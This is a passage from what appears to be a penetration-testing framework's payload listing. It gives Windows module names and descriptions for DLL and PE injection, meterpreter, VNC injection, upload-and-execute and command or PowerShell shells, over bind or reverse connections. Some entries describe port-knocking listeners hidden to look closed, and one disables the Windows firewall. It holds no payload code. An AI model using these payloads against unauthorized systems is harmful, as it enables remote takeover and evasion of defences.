IPv6 connection with UUID Support (Windows x86)\nwindows/patchupdllinject/bind_named_pipe Inject a custom DLL into the exploited process. Listen for a pipe connection (Windows x86)\nwindows/patchupdllinject/bind_nonx_tcp Inject a custom DLL into the exploited process. 
Listen for a connection (No NX)\nwindows/patchupdllinject/bind_tcp Inject a custom DLL into the exploited process. Listen for a connection (Windows x86)\nwindows/patchupdllinject/bind_tcp_rc4 Inject a custom DLL into the exploited process. Listen for a connection\nwindows/patchupdllinject/bind_tcp_uuid Inject a custom DLL into the exploited process. Listen for a connection with UUID Support (Windows x86)\nwindows/patchupdllinject/find_tag Inject a custom DLL into the exploited process. Use an established connection\nwindows/patchupdllinject/reverse_ipv6_tcp Inject a custom DLL into the exploited process. Connect back to the attacker over IPv6\nwindows/patchupdllinject/reverse_nonx_tcp Inject a custom DLL into the exploited process. Connect back to the attacker (No NX)\nwindows/patchupdllinject/reverse_ord_tcp Inject a custom DLL into the exploited process. Connect back to the attacker\nwindows/patchupdllinject/reverse_tcp Inject a custom DLL into the exploited process. Connect back to the attacker\nwindows/patchupdllinject/reverse_tcp_allports Inject a custom DLL into the exploited process. Try to connect back to the attacker, on all possible ports (1-65535, slowly)\nwindows/patchupdllinject/reverse_tcp_dns Inject a custom DLL into the exploited process. Connect back to the attacker\nwindows/patchupdllinject/reverse_tcp_rc4 Inject a custom DLL into the exploited process. Connect back to the attacker\nwindows/patchupdllinject/reverse_tcp_rc4_dns Inject a custom DLL into the exploited process. Connect back to the attacker\nwindows/patchupdllinject/reverse_tcp_uuid Inject a custom DLL into the exploited process. Connect back to the attacker with UUID Support\nwindows/patchupmeterpreter/bind_hidden_ipknock_tcp Inject the meterpreter server DLL (staged). Listen for a connection. First, the port will need to be knocked from the IP defined in KHOST. This IP will work as an authentication method (you can spoof it with tools like hping). 
After that you could get your shellcode from any IP. The socket will appear as "closed," thus helping to hide the shellcode\nwindows/patchupmeterpreter/bind_hidden_tcp Inject the meterpreter server DLL (staged). Listen for a connection from a hidden port and spawn a command shell to the allowed host.\nwindows/patchupmeterpreter/bind_ipv6_tcp Inject the meterpreter server DLL (staged). Listen for an IPv6 connection (Windows x86)\nwindows/patchupmeterpreter/bind_ipv6_tcp_uuid Inject the meterpreter server DLL (staged). Listen for an IPv6 connection with UUID Support (Windows x86)\nwindows/patchupmeterpreter/bind_named_pipe Inject the meterpreter server DLL (staged). Listen for a pipe connection (Windows x86)\nwindows/patchupmeterpreter/bind_nonx_tcp Inject the meterpreter server DLL (staged). Listen for a connection (No NX)\nwindows/patchupmeterpreter/bind_tcp Inject the meterpreter server DLL (staged). Listen for a connection (Windows x86)\nwindows/patchupmeterpreter/bind_tcp_rc4 Inject the meterpreter server DLL (staged). Listen for a connection\nwindows/patchupmeterpreter/bind_tcp_uuid Inject the meterpreter server DLL (staged). Listen for a connection with UUID Support (Windows x86)\nwindows/patchupmeterpreter/find_tag Inject the meterpreter server DLL (staged). Use an established connection\nwindows/patchupmeterpreter/reverse_ipv6_tcp Inject the meterpreter server DLL (staged). Connect back to the attacker over IPv6\nwindows/patchupmeterpreter/reverse_nonx_tcp Inject the meterpreter server DLL (staged). Connect back to the attacker (No NX)\nwindows/patchupmeterpreter/reverse_ord_tcp Inject the meterpreter server DLL (staged). Connect back to the attacker\nwindows/patchupmeterpreter/reverse_tcp Inject the meterpreter server DLL (staged). Connect back to the attacker\nwindows/patchupmeterpreter/reverse_tcp_allports Inject the meterpreter server DLL (staged). 
Try to connect back to the attacker, on all possible ports (1-65535, slowly)\nwindows/patchupmeterpreter/reverse_tcp_dns Inject the meterpreter server DLL (staged). Connect back to the attacker\nwindows/patchupmeterpreter/reverse_tcp_rc4 Inject the meterpreter server DLL (staged). Connect back to the attacker\nwindows/patchupmeterpreter/reverse_tcp_rc4_dns Inject the meterpreter server DLL (staged). Connect back to the attacker\nwindows/patchupmeterpreter/reverse_tcp_uuid Inject the meterpreter server DLL (staged). Connect back to the attacker with UUID Support\nwindows/peinject/bind_hidden_ipknock_tcp Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Listen for a connection.First, the port will need to be knocked from the IP defined in KHOST. This IP will work as an authentication method (you can spoof it with tools like hping). After that you couldget your shellcode from any IP. The socket will appear as "closed," thus helping to hide the shellcode\nwindows/peinject/bind_hidden_tcp Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . 
Listen for a connectionfrom a hidden port and spawn a command shell to the allowed host.\nwindows/peinject/bind_ipv6_tcp Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Listen for an IPv6 connection (Windows x86)\nwindows/peinject/bind_ipv6_tcp_uuid Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Listen for an IPv6 connection with UUID Support (Windows x86)\nwindows/peinject/bind_named_pipe Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Listen for a pipe connection (Windows x86)\nwindows/peinject/bind_nonx_tcp Inject a custom native PE file into the exploited process using a reflective PE loader. 
The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Listen for a connection(No NX)\nwindows/peinject/bind_tcp Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Listen for a connection(Windows x86)\nwindows/peinject/bind_tcp_rc4 Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Listen for a connection\nwindows/peinject/bind_tcp_uuid Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. 
PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Listen for a connectionwith UUID Support (Windows x86)\nwindows/peinject/find_tag Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Use an established connection\nwindows/peinject/reverse_ipv6_tcp Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Connect back to the attacker over IPv6\nwindows/peinject/reverse_named_pipe Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . 
Connect back to the attacker via a named pipe pivot\nwindows/peinject/reverse_nonx_tcp Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Connect back to the attacker (No NX)\nwindows/peinject/reverse_ord_tcp Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Connect back to the attacker\nwindows/peinject/reverse_tcp Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Connect back to the attacker\nwindows/peinject/reverse_tcp_allports Inject a custom native PE file into the exploited process using a reflective PE loader. 
The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Try to connect back to the attacker, on all possible ports (1-65535, slowly)\nwindows/peinject/reverse_tcp_dns Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Connect back to the attacker\nwindows/peinject/reverse_tcp_rc4 Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Connect back to the attacker\nwindows/peinject/reverse_tcp_rc4_dns Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. 
This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Connect back to the attacker\nwindows/peinject/reverse_tcp_uuid Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Connect back to the attacker with UUID Support\nwindows/pingback_bind_tcp Open a socket and report UUID when a connection is received (Windows x86)\nwindows/pingback_reverse_tcp Connect back to attacker and report UUID (Windows x86)\nwindows/powershell_bind_tcp Listen for a connection and spawn an interactive powershell session\nwindows/powershell_reverse_tcp Listen for a connection and spawn an interactive powershell session\nwindows/shell/bind_hidden_ipknock_tcp Spawn a piped command shell (staged). Listen for a connection. First, the port will need to be knocked from the IP defined in KHOST. This IP will work as an authentication method(you can spoof it with tools like hping). After that you could get your shellcode from any IP. The socket will appear as "closed," thus helping to hide the shellcode\nwindows/shell/bind_hidden_tcp Spawn a piped command shell (staged). Listen for a connection from a hidden port and spawn a command shell to the allowed host.\nwindows/shell/bind_ipv6_tcp Spawn a piped command shell (staged). Listen for an IPv6 connection (Windows x86)\nwindows/shell/bind_ipv6_tcp_uuid Spawn a piped command shell (staged). 
Listen for an IPv6 connection with UUID Support (Windows x86)\nwindows/shell/bind_named_pipe Spawn a piped command shell (staged). Listen for a pipe connection (Windows x86)\nwindows/shell/bind_nonx_tcp Spawn a piped command shell (staged). Listen for a connection (No NX)\nwindows/shell/bind_tcp Spawn a piped command shell (staged). Listen for a connection (Windows x86)\nwindows/shell/bind_tcp_rc4 Spawn a piped command shell (staged). Listen for a connection\nwindows/shell/bind_tcp_uuid Spawn a piped command shell (staged). Listen for a connection with UUID Support (Windows x86)\nwindows/shell/find_tag Spawn a piped command shell (staged). Use an established connection\nwindows/shell/reverse_ipv6_tcp Spawn a piped command shell (staged). Connect back to the attacker over IPv6\nwindows/shell/reverse_nonx_tcp Spawn a piped command shell (staged). Connect back to the attacker (No NX)\nwindows/shell/reverse_ord_tcp Spawn a piped command shell (staged). Connect back to the attacker\nwindows/shell/reverse_tcp Spawn a piped command shell (staged). Connect back to the attacker\nwindows/shell/reverse_tcp_allports Spawn a piped command shell (staged). Try to connect back to the attacker, on all possible ports (1-65535, slowly)\nwindows/shell/reverse_tcp_dns Spawn a piped command shell (staged). Connect back to the attacker\nwindows/shell/reverse_tcp_rc4 Spawn a piped command shell (staged). Connect back to the attacker\nwindows/shell/reverse_tcp_rc4_dns Spawn a piped command shell (staged). Connect back to the attacker\nwindows/shell/reverse_tcp_uuid Spawn a piped command shell (staged). Connect back to the attacker with UUID Support\nwindows/shell/reverse_udp Spawn a piped command shell (staged). 
Connect back to the attacker with UUID Support\nwindows/shell_bind_tcp Listen for a connection and spawn a command shell\nwindows/shell_bind_tcp_xpfw Disable the Windows ICF, then listen for a connection and spawn a command shell\nwindows/shell_hidden_bind_tcp Listen for a connection from certain IP and spawn a command shell. The shellcode will reply with a RST packet if the connections is not coming from the IP defined in AHOST. This way the port will appear as "closed" helping us to hide the shellcode.\nwindows/shell_reverse_tcp Connect back to attacker and spawn a command shell\nwindows/speak_pwned Causes the target to say "You Got Pwned" via the Windows Speech API\nwindows/upexec/bind_hidden_ipknock_tcp Uploads an executable and runs it (staged). Listen for a connection. First, the port will need to be knocked from the IP defined in KHOST. This IP will work as an authentication method (you can spoof it with tools like hping). After that you could get your shellcode from any IP. The socket will appear as "closed," thus helping to hide the shellcode\nwindows/upexec/bind_hidden_tcp Uploads an executable and runs it (staged). Listen for a connection from a hidden port and spawn a command shell to the allowed host.\nwindows/upexec/bind_ipv6_tcp Uploads an executable and runs it (staged). Listen for an IPv6 connection (Windows x86)\nwindows/upexec/bind_ipv6_tcp_uuid Uploads an executable and runs it (staged). Listen for an IPv6 connection with UUID Support (Windows x86)\nwindows/upexec/bind_named_pipe Uploads an executable and runs it (staged). Listen for a pipe connection (Windows x86)\nwindows/upexec/bind_nonx_tcp Uploads an executable and runs it (staged). Listen for a connection (No NX)\nwindows/upexec/bind_tcp Uploads an executable and runs it (staged). Listen for a connection (Windows x86)\nwindows/upexec/bind_tcp_rc4 Uploads an executable and runs it (staged). Listen for a connection\nwindows/upexec/bind_tcp_uuid Uploads an executable and runs it (staged). 
Listen for a connection with UUID Support (Windows x86)\nwindows/upexec/find_tag Uploads an executable and runs it (staged). Use an established connection\nwindows/upexec/reverse_ipv6_tcp Uploads an executable and runs it (staged). Connect back to the attacker over IPv6\nwindows/upexec/reverse_nonx_tcp Uploads an executable and runs it (staged). Connect back to the attacker (No NX)\nwindows/upexec/reverse_ord_tcp Uploads an executable and runs it (staged). Connect back to the attacker\nwindows/upexec/reverse_tcp Uploads an executable and runs it (staged). Connect back to the attacker\nwindows/upexec/reverse_tcp_allports Uploads an executable and runs it (staged). Try to connect back to the attacker, on all possible ports (1-65535, slowly)\nwindows/upexec/reverse_tcp_dns Uploads an executable and runs it (staged). Connect back to the attacker\nwindows/upexec/reverse_tcp_rc4 Uploads an executable and runs it (staged). Connect back to the attacker\nwindows/upexec/reverse_tcp_rc4_dns Uploads an executable and runs it (staged). Connect back to the attacker\nwindows/upexec/reverse_tcp_uuid Uploads an executable and runs it (staged). Connect back to the attacker with UUID Support\nwindows/upexec/reverse_udp Uploads an executable and runs it (staged). Connect back to the attacker with UUID Support\nwindows/vncinject/bind_hidden_ipknock_tcp Inject a VNC Dll via a reflective loader (staged). Listen for a connection. First, the port will need to be knocked from the IP defined in KHOST. This IP will work as an authentication method (you can spoof it with tools like hping). After that you could get your shellcode from any IP. The socket will appear as "closed," thus helping to hide the shellcode\nwindows/vncinject/bind_hidden_tcp Inject a VNC Dll via a reflective loader (staged). Listen for a connection from a hidden port and spawn a command shell to the allowed host.\nwindows/vncinject/bind_ipv6_tcp Inject a VNC Dll via a reflective loader (staged). 
Listen for an IPv6 connection (Windows x86)\nwindows/vncinject/bind_ipv6_tcp_uuid Inject a VNC Dll via a reflective loader (staged). Listen for an IPv6 connection with UUID Support (Windows x86)\nwindows/vncinject/bind_named_pipe Inject a VNC Dll via a reflective loader (staged). Listen for a pipe connection (Windows x86)\nwindows/vncinject/bind_nonx_tcp Inject a VNC Dll via a reflective loader (staged). Listen for a connection (No NX)\nwindows/vncinject/bind_tcp Inject a VNC Dll via a reflective loader (staged). Listen for a connection (Windows x86)\nwindows/vncinject/bind_tcp_rc4 Inject a VNC Dll via a reflective loader (staged). Listen for a connection\nwindows/vncinject/bind_tcp_uuid Inject a VNC Dll via a reflective loader (staged). Listen for a connection with UUID Support (Windows x86)\nwindows/vncinject/find_tag Inject a VNC Dll via a reflective loader (staged). Use an established connection\nwindows/vncinject/reverse_hop_http Inject a VNC Dll via a reflective loader (staged). Tunnel communication over an HTTP or HTTPS hop point. Note that you must first upload data/hop/hop.php to the PHP server you wish to use as a hop.\nwindows/vncinject/reverse_http Inject a VNC Dll via a reflective loader (staged). Tunnel communication over HTTP (Windows wininet)\nwindows/vncinject/reverse_http_proxy_pstore Inject a VNC Dll via a reflective loader (staged). Tunnel communication over HTTP\nwindows/vncinject/reverse_ipv6_tcp Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker over IPv6\nwindows/vncinject/reverse_nonx_tcp Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker (No NX)\nwindows/vncinject/reverse_ord_tcp Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker\nwindows/vncinject/reverse_tcp Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker\nwindows/vncinject/reverse_tcp_allports Inject a VNC Dll via a reflective loader (staged). 
Try to connect back to the attacker, on all possible ports (1-65535, slowly)\nwindows/vncinject/reverse_tcp_dns Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker\nwindows/vncinject/reverse_tcp_rc4 Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker\nwindows/vncinject/reverse_tcp_rc4_dns Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker\nwindows/vncinject/reverse_tcp_uuid Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker with UUID Support\nwindows/vncinject/reverse_winhttp Inject a VNC Dll via a reflective loader (staged). Tunnel communication over HTTP (Windows winhttp)\nwindows/x64/exec Execute an arbitrary command (Windows x64)\nwindows/x64/loadlibrary Load an arbitrary x64 library path\nwindows/x64/messagebox Spawn a dialog via MessageBox using a customizable title, text & icon\nwindows/x64/meterpreter/bind_ipv6_tcp Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for an IPv6 connection (Windows x64)\nwindows/x64/meterpreter/bind_ipv6_tcp_uuid Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for an IPv6 connection with UUID Support (Windows x64)\nwindows/x64/meterpreter/bind_named_pipe Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for a pipe connection (Windows x64)\nwindows/x64/meterpreter/bind_tcp Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for a connection (Windows x64)\nwindows/x64/meterpreter/bind_tcp_rc4 Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. 
Connect back to the attacker\nwindows/x64/meterpreter/bind_tcp_uuid Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for a connection with UUID Support (Windows x64)\nwindows/x64/meterpreter/reverse_http Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over HTTP (Windows x64 wininet)\nwindows/x64/meterpreter/reverse_https Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over HTTP (Windows x64 wininet)\nwindows/x64/meterpreter/reverse_named_pipe Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker via a named pipe pivot\nwindows/x64/meterpreter/reverse_tcp Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker (Windows x64)\nwindows/x64/meterpreter/reverse_tcp_rc4 Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker\nwindows/x64/meterpreter/reverse_tcp_uuid Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker with UUID Support (Windows x64)\nwindows/x64/meterpreter/reverse_winhttp Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over HTTP (Windows x64 winhttp)\nwindows/x64/meterpreter/reverse_winhttps Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. 
Tunnel communication over HTTPS (Windows x64 winhttp)\nwindows/x64/meterpreter_bind_named_pipe Connect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.\nwindows/x64/meterpreter_bind_tcp Connect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.\nwindows/x64/meterpreter_reverse_http Connect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.\nwindows/x64/meterpreter_reverse_https Connect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.\nwindows/x64/meterpreter_reverse_ipv6_tcp Connect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.\nwindows/x64/meterpreter_reverse_tcp Connect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.\nwindows/x64/peinject/bind_ipv6_tcp Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. Listen for an IPv6 connection (Windows x64)\nwindows/x64/peinject/bind_ipv6_tcp_uuid Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. 
Listen for an IPv6 connection with UUID Support (Windows x64)\nwindows/x64/peinject/bind_named_pipe Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. Listen for a pipe connection (Windows x64)\nwindows/x64/peinject/bind_tcp Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. Listen for a connection(Windows x64)\nwindows/x64/peinject/bind_tcp_rc4 Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. Connect back to the attacker\nwindows/x64/peinject/bind_tcp_uuid Inject a custom native PE file into the exploited process using a reflective PE loader. 
The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. Listen for a connectionwith UUID Support (Windows x64)\nwindows/x64/peinject/reverse_named_pipe Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. Connect back to the attacker via a named pipe pivot\nwindows/x64/peinject/reverse_tcp Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. Connect back to the attacker (Windows x64)\nwindows/x64/peinject/reverse_tcp_rc4 Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. 
This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. Connect back to the attacker\nwindows/x64/peinject/reverse_tcp_uuid Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. Connect back to the attacker with UUID Support (Windows x64)\nwindows/x64/pingback_reverse_tcp Connect back to attacker and report UUID (Windows x64)\nwindows/x64/powershell_bind_tcp Listen for a connection and spawn an interactive powershell session\nwindows/x64/powershell_reverse_tcp Listen for a connection and spawn an interactive powershell session\nwindows/x64/shell/bind_ipv6_tcp Spawn a piped command shell (Windows x64) (staged). Listen for an IPv6 connection (Windows x64)\nwindows/x64/shell/bind_ipv6_tcp_uuid Spawn a piped command shell (Windows x64) (staged). Listen for an IPv6 connection with UUID Support (Windows x64)\nwindows/x64/shell/bind_named_pipe Spawn a piped command shell (Windows x64) (staged). Listen for a pipe connection (Windows x64)\nwindows/x64/shell/bind_tcp Spawn a piped command shell (Windows x64) (staged). Listen for a connection (Windows x64)\nwindows/x64/shell/bind_tcp_rc4 Spawn a piped command shell (Windows x64) (staged). Connect back to the attacker\nwindows/x64/shell/bind_tcp_uuid Spawn a piped command shell (Windows x64) (staged). 
Listen for a connection with UUID Support (Windows x64)\nwindows/x64/shell/reverse_tcp Spawn a piped command shell (Windows x64) (staged). Connect back to the attacker (Windows x64)\nwindows/x64/shell/reverse_tcp_rc4 Spawn a piped command shell (Windows x64) (staged). Connect back to the attacker\nwindows/x64/shell/reverse_tcp_uuid Spawn a piped command shell (Windows x64) (staged). Connect back to the attacker with UUID Support (Windows x64)\nwindows/x64/shell_bind_tcp Listen for a connection and spawn a command shell (Windows x64)\nwindows/x64/shell_reverse_tcp Connect back to attacker and spawn a command shell (Windows x64)\nwindows/x64/vncinject/bind_ipv6_tcp Inject a VNC Dll via a reflective loader (Windows x64) (staged). Listen for an IPv6 connection (Windows x64)\nwindows/x64/vncinject/bind_ipv6_tcp_uuid Inject a VNC Dll via a reflective loader (Windows x64) (staged). Listen for an IPv6 connection with UUID Support (Windows x64)\nwindows/x64/vncinject/bind_named_pipe Inject a VNC Dll via a reflective loader (Windows x64) (staged). Listen for a pipe connection (Windows x64)\nwindows/x64/vncinject/bind_tcp Inject a VNC Dll via a reflective loader (Windows x64) (staged). Listen for a connection (Windows x64)\nwindows/x64/vncinject/bind_tcp_rc4 Inject a VNC Dll via a reflective loader (Windows x64) (staged). Connect back to the attacker\nwindows/x64/vncinject/bind_tcp_uuid Inject a VNC Dll via a reflective loader (Windows x64) (staged). Listen for a connection with UUID Support (Windows x64)\nwindows/x64/vncinject/reverse_http Inject a VNC Dll via a reflective loader (Windows x64) (staged). Tunnel communication over HTTP (Windows x64 wininet)\nwindows/x64/vncinject/reverse_https Inject a VNC Dll via a reflective loader (Windows x64) (staged). Tunnel communication over HTTP (Windows x64 wininet)\nwindows/x64/vncinject/reverse_tcp Inject a VNC Dll via a reflective loader (Windows x64) (staged). 
